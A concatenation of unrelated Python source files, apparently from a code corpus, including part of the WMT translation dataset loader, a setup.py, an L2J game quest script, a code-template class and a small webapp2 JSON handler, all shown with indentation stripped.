path=("dev/newsdev2019-{src}en-src.{src}.sgm", "dev/newsdev2019-{src}en-ref.en.sgm"),
),
SubDataset(
name="newsdiscussdev2015",
target="en",
sources={"fr"},
url="https://huggingface.co/datasets/wmt/wmt19/resolve/main/translation-task/dev.tgz",
path=("dev/newsdiscussdev2015-{src}en-src.{src}.sgm", "dev/newsdiscussdev2015-{src}en-ref.en.sgm"),
),
SubDataset(
name="newsdiscusstest2015",
target="en",
sources={"fr"},
url="https://huggingface.co/datasets/wmt/wmt19/resolve/main/translation-task/dev.tgz",
path=("dev/newsdiscusstest2015-{src}en-src.{src}.sgm", "dev/newsdiscusstest2015-{src}en-ref.en.sgm"),
),
SubDataset(
name="newssyscomb2009",
target="en",
sources={"cs", "de", "es", "fr"},
url="https://huggingface.co/datasets/wmt/wmt19/resolve/main/translation-task/dev.tgz",
path=("dev/newssyscomb2009.{src}", "dev/newssyscomb2009.en"),
),
SubDataset(
name="newstest2008",
target="en",
sources={"cs", "de", "es", "fr", "hu"},
url="https://huggingface.co/datasets/wmt/wmt19/resolve/main/translation-task/dev.tgz",
path=("dev/news-test2008.{src}", "dev/news-test2008.en"),
),
SubDataset(
name="newstest2009",
target="en",
sources={"cs", "de", "es", "fr"},
url="https://huggingface.co/datasets/wmt/wmt19/resolve/main/translation-task/dev.tgz",
path=("dev/newstest2009.{src}", "dev/newstest2009.en"),
),
SubDataset(
name="newstest2010",
target="en",
sources={"cs", "de", "es", "fr"},
url="https://huggingface.co/datasets/wmt/wmt19/resolve/main/translation-task/dev.tgz",
path=("dev/newstest2010.{src}", "dev/newstest2010.en"),
),
SubDataset(
name="newstest2011",
target="en",
sources={"cs", "de", "es", "fr"},
url="https://huggingface.co/datasets/wmt/wmt19/resolve/main/translation-task/dev.tgz",
path=("dev/newstest2011.{src}", "dev/newstest2011.en"),
),
SubDataset(
name="newstest2012",
target="en",
sources={"cs", "de", "es", "fr", "ru"},
url="https://huggingface.co/datasets/wmt/wmt19/resolve/main/translation-task/dev.tgz",
path=("dev/newstest2012.{src}", "dev/newstest2012.en"),
),
SubDataset(
name="newstest2013",
target="en",
sources={"cs", "de", "es", "fr", "ru"},
url="https://huggingface.co/datasets/wmt/wmt19/resolve/main/translation-task/dev.tgz",
path=("dev/newstest2013.{src}", "dev/newstest2013.en"),
),
SubDataset(
name="newstest2014",
target="en",
sources={"cs", "de", "es", "fr", "hi", "ru"},
url="https://huggingface.co/datasets/wmt/wmt19/resolve/main/translation-task/dev.tgz",
path=("dev/newstest2014-{src}en-src.{src}.sgm", "dev/newstest2014-{src}en-ref.en.sgm"),
),
SubDataset(
name="newstest2015",
target="en",
sources={"cs", "de", "fi", "ru"},
url="https://huggingface.co/datasets/wmt/wmt19/resolve/main/translation-task/dev.tgz",
path=("dev/newstest2015-{src}en-src.{src}.sgm", "dev/newstest2015-{src}en-ref.en.sgm"),
),
SubDataset(
name="newsdiscusstest2015",
target="en",
sources={"fr"},
url="https://huggingface.co/datasets/wmt/wmt19/resolve/main/translation-task/dev.tgz",
path=("dev/newsdiscusstest2015-{src}en-src.{src}.sgm", "dev/newsdiscusstest2015-{src}en-ref.en.sgm"),
),
SubDataset(
name="newstest2016",
target="en",
sources={"cs", "de", "fi", "ro", "ru", "tr"},
url="https://huggingface.co/datasets/wmt/wmt19/resolve/main/translation-task/dev.tgz",
path=("dev/newstest2016-{src}en-src.{src}.sgm", "dev/newstest2016-{src}en-ref.en.sgm"),
),
SubDataset(
name="newstestB2016",
target="en",
sources={"fi"},
url="https://huggingface.co/datasets/wmt/wmt19/resolve/main/translation-task/dev.tgz",
path=("dev/newstestB2016-enfi-ref.{src}.sgm", "dev/newstestB2016-enfi-src.en.sgm"),
),
SubDataset(
name="newstest2017",
target="en",
sources={"cs", "de", "fi", "lv", "ru", "tr", "zh"},
url="https://huggingface.co/datasets/wmt/wmt19/resolve/main/translation-task/dev.tgz",
path=("dev/newstest2017-{src}en-src.{src}.sgm", "dev/newstest2017-{src}en-ref.en.sgm"),
),
SubDataset(
name="newstestB2017",
target="en",
sources={"fi"},
url="https://huggingface.co/datasets/wmt/wmt19/resolve/main/translation-task/dev.tgz",
path=("dev/newstestB2017-fien-src.fi.sgm", "dev/newstestB2017-fien-ref.en.sgm"),
),
SubDataset(
name="newstest2018",
target="en",
sources={"cs", "de", "et", "fi", "ru", "tr", "zh"},
url="https://huggingface.co/datasets/wmt/wmt19/resolve/main/translation-task/dev.tgz",
path=("dev/newstest2018-{src}en-src.{src}.sgm", "dev/newstest2018-{src}en-ref.en.sgm"),
),
]
DATASET_MAP = {dataset.name: dataset for dataset in _TRAIN_SUBSETS + _DEV_SUBSETS}
_CZENG17_FILTER = SubDataset(
name="czeng17_filter",
target="en",
sources={"cs"},
url="http://ufal.mff.cuni.cz/czeng/download.php?f=convert_czeng16_to_17.pl.zip",
path="convert_czeng16_to_17.pl",
)
class WmtConfig(datasets.BuilderConfig):
"""BuilderConfig for WMT."""
def __init__(self, url=None, citation=None, description=None, language_pair=(None, None), subsets=None, **kwargs):
"""BuilderConfig for WMT.
Args:
url: The reference URL for the dataset.
citation: The paper citation for the dataset.
description: The description of the dataset.
language_pair: pair of languages that will be used for translation. Should
contain 2 letter coded strings. For example: ("en", "de").
subsets: Dict[split, list[str]]. List of the subset to use for each of the
split. Note that WMT subclasses overwrite this parameter.
**kwargs: keyword arguments forwarded to super.
"""
name = "%s-%s" % (language_pair[0], language_pair[1])
if "name" in kwargs: # Add name suffix for custom configs
name += "." + kwargs.pop("name")
super(WmtConfig, self).__init__(name=name, description=description, **kwargs)
self.url = url or "http://www.statmt.org"
self.citation = citation
self.language_pair = language_pair
self.subsets = subsets
# TODO(PVP): remove when manual dir works
# +++++++++++++++++++++
if language_pair[1] in ["cs", "hi", "ru"]:
assert NotImplementedError(
"The dataset for {}-en is currently not fully supported.".format(language_pair[1])
)
# +++++++++++++++++++++
class Wmt(ABC, datasets.GeneratorBasedBuilder):
"""WMT translation dataset."""
def __init__(self, *args, **kwargs):
if type(self) == Wmt and "config" not in kwargs: # pylint: disable=unidiomatic-typecheck
raise ValueError(
"The raw `wmt_translate` can only be instantiated with the config "
"kwargs. You may want to use one of the `wmtYY_translate` "
"implementation instead to get the WMT dataset for a specific year."
)
super(Wmt, self).__init__(*args, **kwargs)
@property
@abstractmethod
def _subsets(self):
"""Subsets that make up each split of the dataset."""
raise NotImplementedError("This is an abstract method")
@property
def subsets(self):
"""Subsets that make up each split of the dataset for the language pair."""
source, target = self.config.language_pair
filtered_subsets = {}
for split, ss_names in self._subsets.items():
filtered_subsets[split] = []
for ss_name in ss_names:
dataset = DATASET_MAP[ss_name]
if dataset.target != target or source not in dataset.sources:
logger.info("Skipping sub-dataset that does not include language pair: %s", ss_name)
else:
filtered_subsets[split].append(ss_name)
logger.info("Using sub-datasets: %s", filtered_subsets)
return filtered_subsets
def _info(self):
src, target = self.config.language_pair
return datasets.DatasetInfo(
description=_DESCRIPTION,
features=datasets.Features(
{"translation": datasets.features.Translation(languages=self.config.language_pair)}
),
supervised_keys=(src, target),
homepage=self.config.url,
citation=self.config.citation,
)
def _vocab_text_gen(self, split_subsets, extraction_map, language):
for _, ex in self._generate_examples(split_subsets, extraction_map, with_translation=False):
yield ex[language]
def _split_generators(self, dl_manager):
source, _ = self.config.language_pair
manual_paths_dict = {}
urls_to_download = {}
for ss_name in itertools.chain.from_iterable(self.subsets.values()):
if ss_name == "czeng_17":
# CzEng1.7 is CzEng1.6 with some blocks filtered out. We must download
# the filtering script so we can parse out which blocks need to be
# removed.
urls_to_download[_CZENG17_FILTER.name] = _CZENG17_FILTER.get_url(source)
# get dataset
dataset = DATASET_MAP[ss_name]
if dataset.get_manual_dl_files(source):
# TODO(PVP): following two lines skip configs that are incomplete for now
# +++++++++++++++++++++
logger.info("Skipping {} for now. Incomplete dataset for {}".format(dataset.name, self.config.name))
continue
# +++++++++++++++++++++
manual_dl_files = dataset.get_manual_dl_files(source)
manual_paths = [
os.path.join(os.path.abspath(os.path.expanduser(dl_manager.manual_dir)), fname)
for fname in manual_dl_files
]
assert all(
os.path.exists(path) for path in manual_paths
), "For {0}, you must manually download the following file(s) from {1} and place them in {2}: {3}".format(
dataset.name, dataset.get_url(source), dl_manager.manual_dir, ", ".join(manual_dl_files)
)
# set manual path for correct subset
manual_paths_dict[ss_name] = manual_paths
else:
urls_to_download[ss_name] = dataset.get_url(source)
# Download and extract files from URLs.
downloaded_files = dl_manager.download_and_extract(urls_to_download)
# Extract manually downloaded files.
manual_files = dl_manager.extract(manual_paths_dict)
extraction_map = dict(downloaded_files, **manual_files)
for language in self.config.language_pair:
self._vocab_text_gen(self.subsets[datasets.Split.TRAIN], extraction_map, language)
return [
datasets.SplitGenerator( # pylint:disable=g-complex-comprehension
name=split, gen_kwargs={"split_subsets": split_subsets, "extraction_map": extraction_map}
)
for split, split_subsets in self.subsets.items()
]
def _generate_examples(self, split_subsets, extraction_map, with_translation=True):
"""Returns the examples in the raw (text) form."""
source, _ = self.config.language_pair
def _get_local_paths(dataset, extract_dirs):
rel_paths = dataset.get_path(source)
if len(extract_dirs) == 1:
extract_dirs = extract_dirs * len(rel_paths)
return [
os.path.join(ex_dir, rel_path) if rel_path else ex_dir
for ex_dir, rel_path in zip(extract_dirs, rel_paths)
]
for ss_name in split_subsets:
# TODO(PVP) remove following five lines when manual data works
# +++++++++++++++++++++
dataset = DATASET_MAP[ss_name]
source, _ = self.config.language_pair
if dataset.get_manual_dl_files(source):
logger.info("Skipping {} for now. Incomplete dataset for {}".format(dataset.name, self.config.name))
continue
# +++++++++++++++++++++
logger.info("Generating examples from: %s", ss_name)
dataset = DATASET_MAP[ss_name]
extract_dirs = extraction_map[ss_name]
files = _get_local_paths(dataset, extract_dirs)
if ss_name.startswith("czeng"):
if ss_name.endswith("16pre"):
sub_generator = functools.partial(_parse_tsv, language_pair=("en", "cs"))
elif ss_name.endswith("17"):
filter_path = _get_local_paths(_CZENG17_FILTER, extraction_map[_CZENG17_FILTER.name])[0]
sub_generator = functools.partial(_parse_czeng, filter_path=filter_path)
else:
sub_generator = _parse_czeng
elif ss_name == "hindencorp_01":
sub_generator = _parse_hindencorp
elif len(files) == 2:
if ss_name.endswith("_frde"):
sub_generator = _parse_frde_bitext
else:
sub_generator = _parse_parallel_sentences
elif len(files) == 1:
fname = files[0]
# Note: Due to formatting used by `download_manager`, the file
# extension may not be at the end of the file path.
if ".tsv" in fname:
sub_generator = _parse_tsv
elif (
ss_name.startswith("newscommentary_v14")
or ss_name.startswith("europarl_v9")
or ss_name.startswith("wikititles_v1")
):
sub_generator = functools.partial(_parse_tsv, language_pair=self.config.language_pair)
elif "tmx" in fname or ss_name.startswith("paracrawl_v3"):
sub_generator = _parse_tmx
elif ss_name.startswith("wikiheadlines"):
sub_generator = _parse_wikiheadlines
else:
raise ValueError("Unsupported file format: %s" % fname)
else:
raise ValueError("Invalid number of files: %d" % len(files))
for sub_key, ex in sub_generator(*files):
if not all(ex.values()):
continue
# TODO(adarob): Add subset feature.
# ex["subset"] = subset
key = "{}/{}".format(ss_name, sub_key)
if with_translation is True:
ex = {"translation": ex}
yield key, ex
def _parse_parallel_sentences(f1, f2):
"""Returns examples from parallel SGML or text files, which may be gzipped."""
def _parse_text(path):
"""Returns the sentences from a single text file, which may be gzipped."""
split_path = path.split(".")
if split_path[-1] == "gz":
lang = split_path[-2]
with open(path, "rb") as f, gzip.GzipFile(fileobj=f) as g:
return g.read().decode("utf-8").split("\n"), lang
if split_path[-1] == "txt":
# CWMT
lang = split_path[-2].split("_")[-1]
lang = "zh" if lang in ("ch", "cn") else lang
else:
lang = split_path[-1]
with open(path, "rb") as f:
return f.read().decode("utf-8").split("\n"), lang
def _parse_sgm(path):
"""Returns sentences from a single SGML file."""
lang = path.split(".")[-2]
sentences = []
# Note: We can't use the XML parser since some of the files are badly
# formatted.
seg_re = re.compile(r"<seg id=\"\d+\">(.*)</seg>")
with open(path, encoding="utf-8") as f:
for line in f:
seg_match = re.match(seg_re, line)
if seg_match:
assert len(seg_match.groups()) == 1
sentences.append(seg_match.groups()[0])
return sentences, lang
parse_file = _parse_sgm if f1.endswith(".sgm") else _parse_text
# Some datasets (e.g., CWMT) contain multiple parallel files specified with
# a wildcard. We sort both sets to align them and parse them one by one.
f1_files = sorted(glob.glob(f1))
f2_files = sorted(glob.glob(f2))
assert f1_files and f2_files, "No matching files found: %s, %s." % (f1, f2)
assert len(f1_files) == len(f2_files), "Number of files do not match: %d vs %d for %s vs %s." % (
len(f1_files),
len(f2_files),
f1,
f2,
)
for f_id, (f1_i, f2_i) in enumerate(zip(sorted(f1_files), sorted(f2_files))):
l1_sentences, l1 = parse_file(f1_i)
l2_sentences, l2 = parse_file(f2_i)
assert len(l1_sentences) == len(l2_sentences), "Sizes do not match: %d vs %d for %s vs %s." % (
len(l1_sentences),
len(l2_sentences),
f1_i,
f2_i,
)
for line_id, (s1, s2) in enumerate(zip(l1_sentences, l2_sentences)):
key = "{}/{}".format(f_id, line_id)
yield key, {l1: s1, l2: s2}
def _parse_frde_bitext(fr_path, de_path):
with open(fr_path, encoding="utf-8") as f:
fr_sentences = f.read().split("\n")
with open(de_path, encoding="utf-8") as f:
de_sentences = f.read().split("\n")
assert len(fr_sentences) == len(de_sentences), "Sizes do not match: %d vs %d for %s vs %s." % (
len(fr_sentences),
len(de_sentences),
fr_path,
de_path,
)
for line_id, (s1, s2) in enumerate(zip(fr_sentences, de_sentences)):
yield line_id, {"fr": s1, "de": s2}
def _parse_tmx(path):
"""Generates examples from TMX file."""
def _get_tuv_lang(tuv):
for k, v in tuv.items():
if k.endswith("}lang"):
return v
raise AssertionError("Language not found in `tuv` attributes.")
def _get_tuv_seg(tuv):
segs = tuv.findall("seg")
assert len(segs) == 1, "Invalid number of segments: %d" % len(segs)
return segs[0].text
with open(path, "rb") as f:
# Workaround due to: https://github.com/tensorflow/tensorflow/issues/33563
utf_f = codecs.getreader("utf-8")(f)
for line_id, (_, elem) in enumerate(ElementTree.iterparse(utf_f)):
if elem.tag == "tu":
yield line_id, {_get_tuv_lang(tuv): _get_tuv_seg(tuv) for tuv in elem.iterfind("tuv")}
elem.clear()
def _parse_tsv(path, language_pair=None):
"""Generates examples from TSV file."""
if language_pair is None:
lang_match = re.match(r".*\.([a-z][a-z])-([a-z][a-z])\.tsv", path)
assert lang_match is not None, "Invalid TSV filename: %s" % path
l1, l2 = lang_match.groups()
else:
l1, l2 = language_pair
with open(path, encoding="utf-8") as f:
for j, line in enumerate(f):
cols = line.split("\t")
if len(cols) != 2:
logger.warning("Skipping line %d in TSV (%s) with %d != 2 columns.", j, path, len(cols))
continue
s1, s2 = cols
yield j, {l1: s1.strip(), l2: s2.strip()}
def _parse_wikiheadlines(path):
"""Generates examples from Wikiheadlines dataset file."""
lang_match = re.match(r".*\.([a-z][a-z])-([a-z][a-z])$", path)
assert lang_match is not None, "Invalid Wikiheadlines filename: %s" % path
l1, l2 = lang_match.groups()
with open(path, encoding="utf-8") as f:
for line_id, line in enumerate(f):
s1, s2 = line.split("|||")
yield line_id, {l1: s1.strip(), l2: s2.strip()}
def _parse_czeng(*paths, **kwargs):
"""Generates examples from CzEng v1.6, with optional filtering for v1.7."""
filter_path = kwargs.get("filter_path", None)
if filter_path:
re_block = re.compile(r"^[^-]+-b(\d+)-\d\d[tde]")
with open(filter_path, encoding="utf-8") as f:
bad_blocks = {blk for blk in re.search(r"qw{([\s\d]*)}", f.read()).groups()[0].split()}
logger.info("Loaded %d bad blocks to filter from CzEng v1.6 to make v1.7.", len(bad_blocks))
for path in paths:
for gz_path in sorted(glob.glob(path)):
with open(gz_path, "rb") as g, gzip.GzipFile(fileobj=g) as f:
filename = os.path.basename(gz_path)
for line_id, line in enumerate(f):
line = line.decode("utf-8") # required for py3
if not line.strip():
continue
id_, unused_score, cs, en = line.split("\t")
if filter_path:
block_match = re.match(re_block, id_)
if block_match and block_match.groups()[0] in bad_blocks:
continue
sub_key = "{}/{}".format(filename, line_id)
yield sub_key, {
"cs": cs.strip(),
"en": en.strip(),
}
def _parse_hindencorp(path):
with open(path, encoding="utf-8") as f:
for line_id, line in enumerate(f):
split_line = line.split("\t")
if len(split_line) != 5:
logger.warning("Skipping invalid HindEnCorp line: %s", line)
continue
yield line_id, {"translation": {"en": split_line[3].strip(), "hi": split_line[4].strip()}}
|
py | 1a40d542ac385a2993eb09328a88f13ea6070647 | import os.path
try:
from setuptools import setup, find_packages
except ImportError:
from ez_setup import use_setuptools
use_setuptools()
from setuptools import setup, find_packages
def read(fname):
return open(os.path.join(os.path.dirname(__file__), fname)).read()
setup(name='wp_iso3166',
version="0.1",
author="original author, Mike Spindel",
author_email="-",
license="MIT",
keywords="iso 3166-1 country codes WorldPop",
url="https://github.com/vesnikos/wp_iso3166",
description='Self-contained ISO 3166-1 country definitions.',
packages=find_packages(exclude=['ez_setup']),
long_description=read('README.rst'),
zip_safe=False,
classifiers=[
"Development Status :: 5 - Production/Stable",
"License :: OSI Approved :: MIT License",
"Intended Audience :: Developers",
"Natural Language :: English",
"Programming Language :: Python",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.4",
])
|
py | 1a40d589087f8573e3687d249264e749663c5d9a | # Rewritten by RayzoR
import sys
from com.l2jfrozen.gameserver.model.quest import State
from com.l2jfrozen.gameserver.model.quest import QuestState
from com.l2jfrozen.gameserver.model.quest.jython import QuestJython as JQuest
from com.l2jfrozen.gameserver.model.base import Race
qn = "236_SeedsOfChaos"
DROP_RATE = 20
#prerequisites:
STAR_OF_DESTINY = 5011
#Quest items
BLACK_ECHO_CRYSTAL = 9745
SHINING_MEDALLION = 9743
#How many of each do you need?
NEEDED = {
BLACK_ECHO_CRYSTAL: 1,
SHINING_MEDALLION: 62
}
SCROLL_ENCHANT_WEAPON_A = 729
#NPCs
KEKROPUS,WIZARD,KATENAR,ROCK,HARKILGAMED,MAO,RODENPICULA,NORNIL = 32138,31522,32235,32238,32334,32190,32237,32239
#Mobs
NEEDLE_STAKATO_DRONE = [21516,21517]
SPLENDOR_MOBS = [21520,21521,21522,21523,21524,21525,21526,21527,21528,21529,21530,21531,21532,21533,21534,21535,21536,21537,21538,21539,21540,21541]
#Mobs, cond, Drop
DROPLIST = {
#Needle Stakato Drones
21516: [2,BLACK_ECHO_CRYSTAL],
21517: [2,BLACK_ECHO_CRYSTAL],
#Splendor Mobs
21520: [12,SHINING_MEDALLION],
21521: [12,SHINING_MEDALLION],
21522: [12,SHINING_MEDALLION],
21523: [12,SHINING_MEDALLION],
21524: [12,SHINING_MEDALLION],
21525: [12,SHINING_MEDALLION],
21526: [12,SHINING_MEDALLION],
21527: [12,SHINING_MEDALLION],
21528: [12,SHINING_MEDALLION],
21529: [12,SHINING_MEDALLION],
21530: [12,SHINING_MEDALLION],
21531: [12,SHINING_MEDALLION],
21532: [12,SHINING_MEDALLION],
21533: [12,SHINING_MEDALLION],
21534: [12,SHINING_MEDALLION],
21535: [12,SHINING_MEDALLION],
21536: [12,SHINING_MEDALLION],
21537: [12,SHINING_MEDALLION],
21538: [12,SHINING_MEDALLION],
21539: [12,SHINING_MEDALLION],
21540: [12,SHINING_MEDALLION],
21541: [12,SHINING_MEDALLION]
}
class Quest (JQuest) :
def __init__(self,id,name,descr):
JQuest.__init__(self,id,name,descr)
self.katenar = self.harkil = 0
self.questItemId = [BLACK_ECHO_CRYSTAL, SHINING_MEDALLION]
def onEvent (self,event,st) :
if event == "1" : #Go talk to the wizard!
st.setState(STARTED)
st.set("cond","1")
st.playSound("ItemSound.quest_accept")
htmltext = "32138_02b.htm"
elif event == "1_yes" : #Ok, know about those Stakato Drones?
htmltext = "31522_01c.htm"
elif event == "1_no" : #You suck. Come back when you want to talk
htmltext = "31522_01no.htm"
elif event == "2" : #Get me the crystal
st.set("cond","2")
htmltext = "31522_02.htm"
elif event == "31522_03b" :
st.takeItems(BLACK_ECHO_CRYSTAL,-1)
htmltext = event + ".htm"
elif event == "4" : #Time to summon this bad boy
st.set("cond","4")
if not self.katenar :
st.addSpawn(KATENAR,120000)
self.katenar = 1
st.startQuestTimer("Despawn_Katenar",120000)
return
elif event == "5" : #gotta go. talk to Harkilgamed
st.set("cond","5")
htmltext = "32235_02.htm"
elif event == "spawn_harkil" : #talk to the rock, this spawns Harkilgamed
if not self.harkil :
st.addSpawn(HARKILGAMED,120000)
self.harkil = 1
st.startQuestTimer("Despawn_Harkil",120000)
return
elif event == "6" : #now go hunt splendor mobs
st.set("cond","12")
htmltext = "32236_06.htm"
elif event == "8" : #go back to Kekropus
st.set("cond","14")
htmltext = "32236_08.htm"
elif event == "9" : #Go talk to Mao, no not the dictator Mao... the Vice Hierarch Mao. <_<
st.set("cond","15")
htmltext = "32138_09.htm"
elif event == "10" : #This is where you can find Rodenpicula.
st.set("cond","16")
st.getPlayer().teleToLocation(-119534,87176,-12593)
htmltext = "32190_02.htm"
elif event == "11" : #Go talk to Mother Nornil now
st.set("cond","17")
htmltext = "32237_11.htm"
elif event == "12" : #Get Rodenpicula's permission
st.set("cond","18")
htmltext = "32239_12.htm"
elif event == "13" : #LETS DO THIS!!
st.set("cond","19")
htmltext = "32237_13.htm"
elif event == "14" : #LEROOY JENKINS!!!! Finish the quest at Rodenpicula
st.set("cond","20")
htmltext = "32239_14.htm"
elif event == "15" : #done done done!!!
st.giveItems(SCROLL_ENCHANT_WEAPON_A,1)
st.setState(COMPLETED)
htmltext = "32237_15.htm"
elif event == "Despawn_Katenar" :
self.katenar = 0
return
elif event == "Despawn_Harkil" :
self.harkil = 0
return
else :
htmltext = event + ".htm" #this is for having to go through pages upon pages of html text... <_<
return htmltext
def onTalk (self,npc,player):
htmltext = "<html><body>You are either not on a quest that involves this NPC, or you don't meet this NPC's minimum quest requirements.</body></html>"
st = player.getQuestState(qn)
if not st : return htmltext
npcId = npc.getNpcId()
id = st.getState()
cond = st.getInt("cond")
if npcId == KEKROPUS :
if id == CREATED :
st.set("cond","0")
if player.getRace() != Race.Kamael :
st.exitQuest(1)
htmltext = "<html><body>I'm sorry, but I can only give this quest to Kamael. Talk to Magister Ladd.</body></html>"
elif player.getLevel() < 75 :
st.exitQuest(1)
htmltext = "32138_01.htm" #not qualified
elif not st.getQuestItemsCount(STAR_OF_DESTINY) :
st.exitQuest(1)
htmltext = "32138_01a.htm" #not qualified
else :
htmltext = "32138_02.htm" # Successful start: Talk to me a few times,
elif id == STARTED :
if cond < 14 :
htmltext = "32138_02c.htm"
elif cond == 14:
htmltext = "32138_08.htm"
else :
htmltext = "<html><body>Kekropus:<br>Go talk to Rodenpicula. Mao can help you get to her.</body></html>"
elif id == COMPLETED :
htmltext = "<html><body>You have already completed this quest.</body></html>"
elif npcId == WIZARD and id == STARTED:
# first time talking to Wizard. Talk a bit
if cond==1 :
htmltext = "31522_01.htm"
# Why are you back already? You don't have the echo crystal
elif cond==2 :
htmltext = "31522_02a.htm" # you haven't gotten the crystal yet?
# aha! Here is the black echo crystal! Now where's that one chap?
elif cond == 3 or (cond == 4 and not self.katenar) :
htmltext = "31522_03.htm" # ah yes. Now you get to talk to this guy that I will soon summon
else :
htmltext = "31522_04.htm" #shouldn't you be talking to Katenar?
elif npcId == KATENAR and id == STARTED:
if cond == 4:
htmltext = "32235_01.htm"
elif cond >= 5:
htmltext = "32235_02.htm"
elif npcId == ROCK and id == STARTED:
if cond == 5 or cond == 13:
htmltext = "32238.htm" #click the link to spawn Harkilgamed
else:
htmltext = "<html><body>A strange rock...</body></html>"
elif npcId == HARKILGAMED and id == STARTED:
if cond == 5:
htmltext = "32236_05.htm" #First time talking to Harkilgamed
elif cond == 12:
htmltext = "32236_06.htm" #Kill the Splendor mobs, bring back 62 Shining Medallions
elif cond == 13:
st.takeItems(SHINING_MEDALLION,-1)
htmltext = "32236_07.htm"
elif cond > 13:
htmltext = "<html><body>Harkilgamed:<br><br>Go talk to Kekropus already.</body></html>"
elif npcId == MAO and id == STARTED: #Ok. The deal with Mao is that he's supposed to port you to Mother Nornil, but since she's not yet in the spawnlist, he's just gonna tell ya where to find her.
#THIS MEANS: WHOEVER SPAWNS NORNIL AND RODENPICULA MUST WRITE THE FOLLOWING .htm FILE ACCORDINGLY
if cond == 15 or cond == 16:
htmltext = "32190_01.htm"
elif npcId == RODENPICULA and id==STARTED:
if cond == 16:
htmltext = "32237_10.htm" #heys. long talk, figure stuff out
elif cond == 17:
htmltext = "32237_11.htm" #talk to nornil already
elif cond == 18:
htmltext = "32237_12.htm" #you want approval
elif cond == 19:
htmltext = "32237_13.htm" #here's approval, talk to her
elif cond == 20:
htmltext = "32237_14.htm" #congrats. here's a scroll
elif npcId == NORNIL and id==STARTED:
if cond == 17:
htmltext = "32239_11.htm" #yo. get rodenpicula's approval
elif cond == 18:
htmltext = "32239_12.htm" #i need rodenpicula's approval
elif cond == 19:
htmltext = "32239_13.htm" #lets get it over with
elif cond == 20:
htmltext = "32239_14.htm" #you're good. talk to roden one more time
return htmltext
def onKill(self,npc,player,isPet):
st = player.getQuestState(qn)
if not st : return
if st.getState() != STARTED : return
#The following algorithm should work for both quest mobs and drops for this quest.... hopefully.
npcId = npc.getNpcId()
dropcond, item = DROPLIST[npcId]
drop = st.getRandom(100)
cond = st.getInt("cond")
if drop < DROP_RATE and cond == dropcond :
if st.getQuestItemsCount(item) < NEEDED[item] :
st.giveItems(item,1)
st.playSound("ItemSound.quest_itemget")
if st.getQuestItemsCount(item) == NEEDED[item]:
st.set("cond",str(cond+1))
return
QUEST = Quest(236,qn,"Seeds of Chaos")
CREATED = State('Start', QUEST)
STARTED = State('Started', QUEST)
COMPLETED = State('Completed', QUEST)
QUEST.setInitialState(CREATED)
QUEST.addStartNpc(KEKROPUS)
QUEST.addTalkId(KEKROPUS)
QUEST.addTalkId(WIZARD)
QUEST.addTalkId(KATENAR)
QUEST.addTalkId(ROCK)
QUEST.addTalkId(HARKILGAMED)
QUEST.addTalkId(MAO)
QUEST.addTalkId(RODENPICULA)
QUEST.addTalkId(NORNIL)
for i in DROPLIST.keys():
QUEST.addKillId(i)
|
py | 1a40d7237b5d579bb514ba03c63899672851fff1 | # -*- coding: utf-8 -*-
from os.path import join
from os.path import dirname
from os.path import isfile
class Template(object):
SUPPORTED_METHODS = {}
TEMPLATES = {}
def __init__(self, estimator, target_language='java',
target_method='predict', **kwargs):
# pylint: disable=unused-argument
self.target_language = str(target_language)
self.target_method = str(target_method)
# Default settings:
self.class_name = 'Brain'
self.method_name = 'predict'
self._num_format = lambda x: str(x)
self.use_file = False
def indent(self, text, n_indents=1, skipping=False):
"""
Indent text with the language-specific indentation string (single spaces by default).
Parameters
----------
:param text : string
The text which get a specific indentation.
:param n_indents : int, default: 1
The number of indentations.
:param skipping : boolean, default: False
Whether to skip the initial indentation.
Returns
-------
return : string
The indented text.
"""
lines = text.splitlines()
space = self.TEMPLATES.get(self.target_language).get('indent', ' ')
# Single line:
if len(lines) == 1:
if skipping:
return text.strip()
return n_indents * space + text.strip()
# Multiple lines:
indented_lines = []
for idx, line in enumerate(lines):
if skipping and idx == 0:
indented_lines.append(line)
else:
line = n_indents * space + line
indented_lines.append(line)
indented_text = '\n'.join(indented_lines)
return indented_text
def temp(self, name, templates=None, n_indents=None, skipping=False):
"""
Get the specific template for the chosen programming language.
Parameters
----------
:param name : string
The key name of the template.
:param templates : string, default: None
The template with placeholders.
:param n_indents : int, default: None
The number of indentations.
:param skipping : bool, default: False
Whether to skip the initial indentation.
Returns
-------
return : string
The wanted template string.
"""
if templates is None:
templates = self.TEMPLATES.get(self.target_language)
keys = name.split('.')
key = keys.pop(0).lower()
template = templates.get(key, None)
if template is not None:
if isinstance(template, str):
if n_indents is not None:
template = self.indent(template, n_indents, skipping)
return template
else:
keys = '.'.join(keys)
return self.temp(keys, template, skipping=False)
else:
class_name = self.__class__.__name__
estimator_type = getattr(self, 'estimator_type') if \
hasattr(self, 'estimator_type') else 'classifier'
path = join(dirname(__file__), 'estimator',
estimator_type, class_name, 'templates',
self.target_language, name + '.txt')
if isfile(path):
with open(path, 'r') as file_:
template = file_.read()
if n_indents is not None:
template = self.indent(template, n_indents, skipping)
return template
else:
err = "Template '{}' wasn't found.".format(name)
raise AttributeError(err)
def repr(self, value):
return self._num_format(value)
def data(self, dict_):
copy = self.__dict__.copy()
copy.update(dict_) # update and extend dictionary
return copy
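# Minimal usage sketch (illustrative only; `DummyTemplate` and its TEMPLATES
# mapping are assumptions, not part of this module). It shows how `temp` looks
# up a language-specific placeholder string and how `indent` applies the
# language's indentation:
#
#   class DummyTemplate(Template):
#       TEMPLATES = {'java': {'indent': '    ', 'init': 'int {name} = {value};'}}
#
#   tpl = DummyTemplate(estimator=None, target_language='java')
#   tpl.temp('init')                 # -> 'int {name} = {value};'
#   tpl.indent('a\nb', n_indents=1)  # -> '    a\n    b'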
|
py | 1a40d776a207ee64f4fb3f6a2d28457afc60e826 | import webapp2
class SliderWS(webapp2.RequestHandler):
def get(self):
self.response.headers["Content-Type"]="application/json"
sliderData="""[{image : '_include/img/slider-images/image01.jpg', title : '<div class="slide-content">Brushed</div>', thumb : '', url : ''},
{image : '_include/img/slider-images/image02.jpg', title : '<div class="slide-content">Brushed</div>', thumb : '', url : ''},
{image : '_include/img/slider-images/image03.jpg', title : '<div class="slide-content">Brushed</div>', thumb : '', url : ''},
{image : '_include/img/slider-images/image04.jpg', title : '<div class="slide-content">Brushed</div>', thumb : '', url : ''}
]"""
self.response.out.write(sliderData) |
py | 1a40d7873baa893d72050b9aee597e0bf3d3cd9c | #! /usr/bin/env python
import numpy as np
import sys
sys.path.append("spnet/")
sys.path.append("../spnet/")
